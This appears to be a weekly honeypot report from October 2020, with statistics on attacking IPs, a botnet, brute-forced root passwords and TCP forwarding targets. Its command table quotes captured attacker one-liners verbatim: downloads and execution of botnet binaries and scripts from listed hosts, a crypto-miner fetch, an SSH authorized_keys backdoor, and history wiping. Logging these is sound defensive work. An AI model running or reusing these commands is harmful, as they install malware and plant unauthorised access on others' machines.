Honey Pot – Previous Week 18 October 2020.

Analyzing the output from the previous week of the honey pot we have detected 319 Unique IPs hitting the server from 39 different countries using a combined 12,534 different password combos.

Total attacking IPs: 319
Total Countries: 39
Total User/pass successful combos: 12534
Total Commands ran: 66
Total TCP Forward requests: 16073

Reviewing the Top 30 IPs we can see the use of a botnet (5.188.86.xx). This botnet is located in Ireland at Global Layer BV.

geoiplookup 5.188.86.164 GeoIP Country Edition: IE, Ireland GeoIP City Edition, Rev 1: IE, 04, Cork, Macroom, P12, 51.900002, -8.950000, 0, 0 GeoIP ASNum Edition: AS49453 Global Layer B.V.
This botnet accounts for 1/3 of the top 30 IP’s hitting the Honeypot

TOP 30 Attacking IP’s

11909 185.111.76.2
5767 5.188.86.164
5431 5.188.86.168
5123 5.188.86.221
5119 5.188.86.165
4904 5.188.87.49
4848 5.188.87.57
4793 5.188.86.216
4746 5.188.86.207
4740 5.188.86.206
4740 5.188.86.169
4605 5.188.87.58
4594 5.188.86.178
4568 5.188.86.210
4506 5.188.86.167
4446 5.188.87.51
4385 45.227.255.207
4268 5.188.62.14
4164 45.227.255.206
3822 5.188.87.53
3748 5.188.86.212
3401 5.188.87.60
2378 157.230.112.195
2301 5.188.62.15
1307 88.214.26.91
1221 5.182.39.61
1050 5.182.39.62
1031 5.182.39.64
1025 88.214.26.92
1000 5.182.39.63

As the countries attacking the Honey pot are diverse, The most IPs coming in are from America followed by Russia, The Irish botnet mentioned above puts Ireland at Rank 4.

Countries of Origin

81 United States
40 Russia
38 China
18 Ireland
16 Germany
16 Netherlands
10 Panama
9 Republic of Lithuania
7 France
7 India
7 South Korea
5 Hong Kong
5 United Kingdom
5 Sweden
5 Vietnam
4 Canada
4 Romania
4 Taiwan
4 Japan
4 Ukraine
4 Indonesia
3 Australia
3 Brazil
2 Italy
2 Colombia
2 Argentina
1 Latvia
1 None
1 Sri Lanka
1 Malaysia

There are no limits to what password combos can be used. The most popular is root/admin with a whooping 107,767 logins.

Username and password combos

107767 root/admin
183 root/1234
53 root/root
52 root/123456
50 root/merlin
43 root/password
33 root/marketing
32 root/12345678
29 root/123
27 root/123456789

This is my favorite part of the report. Seeing what people are trying to run. It is a great way to harvest malicious scripts for further analysis. The most popular command is echo -e "\x6F\x6B" which prints OK.

TOP 30 Commands

11910 echo -e “\x6F\x6B”
353 nproc
319 uname -s -v -n -r
135 uname -a;php -v;
107 uname -a
102 uname -a;nproc
78 uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v ‘heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==’ >>.ssh/.auth_k;echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==’ >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys
71 cat /etc/issue
60 wget http://185.132.53.14/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 roots; rm -rf Astra.* ; history -c
40 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
34 nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh;
29 nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig;
18 cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
18 cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ; rm -rf *
16 cd /tmp; wget http://107.173.122.103/x86; chmod 777 x86; ./x86 Rooted; rm -rf *
12 cd /tmp || cd /run || cd /; wget http://185.132.53.124/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 185.132.53.124 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 185.132.53.124; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
12 ls -la
5 cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.132.53.225/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > sssoggrf; chmod +x sssoggrf; ./sssoggrf; history -c
4 cd /tmp; wget http://194.87.138.97/bins/hoho.x86; chmod 777 ; ./hoho.x86 gift from Magisk#6297 4 /usr/bin/tar Pxvf – 3 2 /ip cloud print 2 ifconfig 2 cat /proc/cpuinfo 2 ps | grep ‘[Mm]iner’ 2 ps -ef | grep ‘[Mm]iner’ 2 ls -la /dev/ttyGSM /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
2 echo Hi | cat -n
2 cd
2 cd /

TOP 30 TCP Forwarding

With TCP forwarding with a Whooping 77,679 requests is to ya.ru (Yandex.ru) followed by 12,661 requests to m.youtube.com on port 443

77679 ya.ru:80
12661 m.youtube.com:443
11089 www.evernote.com:443
7966 opfcaptcha-prod.s3.amazonaws.com:443
7812 oauth.vk.com:443
6497 youtube.com:443
5192 23.60.196.214:443
5118 www.google.com:443
4635 51.159.19.168:80
3962 173.194.222.198:443
3865 209.85.233.198:443
3602 iforgot.apple.com:443
3599 www.amazon.com:443
3575 34.107.165.220:443
3479 appleid.apple.com:443
3469 api.sendspace.com:443
3277 69.195.128.18:80
3098 omegle.com:80
2766 i.instagram.com:443
2733 96.43.128.70:80
2679 ip.bablosoft.com:80
2532 www.youtube.com:443
2492 soundcloud.com:443
2347 www.walmart.com:443
1859 accounts.ea.com:443
1670 173.194.73.198:443
1661 work.a-poster.info:25000
1638 api.portis.io:443
1523 89.39.105.12:80
1517 184.30.189.5:443

As long as the honeypot has been running the botnet from Ireland has always been in the picture. The ranking of countries change week to week as well as the type of commands being ran.